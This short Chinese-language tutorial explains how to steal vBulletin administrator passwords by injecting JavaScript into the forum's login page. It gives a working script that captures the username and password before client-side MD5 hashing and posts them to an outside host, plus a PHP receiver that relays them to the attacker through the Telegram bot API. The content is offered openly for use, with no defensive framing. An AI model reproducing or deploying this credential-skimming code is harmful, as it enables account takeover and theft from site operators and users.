如何竊取 vBulletin 管理員密碼

通過數據庫中的加密密碼來更改管理加密密碼以訪問管理面板，但您可能很快就會離開服務器。

但是有一個更好的解決方案，可以通過網絡釣魚攻擊或使用JavaScript竊取密碼來獲取管理員純文本密碼，我將在本主題中進行介紹。

我們可以使用PHP并在發布請求后獲取密碼，但是vBulletin會在客戶端使用JavaScript使用MD5加密密碼，因此我們將嘗試在密碼加密之前獲取密碼。

我將使用的腳本是：

function mal()
{
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "http://example/admindata.php", true);
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xhr.send("Data="+document.getElementById("vb_login_username").value + " " + document.getElementById("vb_login_password").value);
}

給定的腳本獲取密碼并將其發送到PHP腳本，然后將其寫入文件或使用電報或電子郵件將其發送給您（使用電報API的示例）：

<?php

if ($_SERVER['REQUEST_METHOD'] == "POST" && isset($_POST['Data']))
{
$token = "YOUR_TOKEN";
file_get_contents("https://api.telegram.org/bot$token/sendMessage? 
chat_id=YOUR_CHAT_ID&text=" . urlencode($_POST['Data'])."" );
}
else
    header("Location: https://google.com");
?>

因此，現在您可以將PHP腳本上傳到同一臺服務器或同一臺服務器上，或者可以直接從JavaScript發送密碼。

回答所涉及的環境：聯想天逸510S、Windows 10。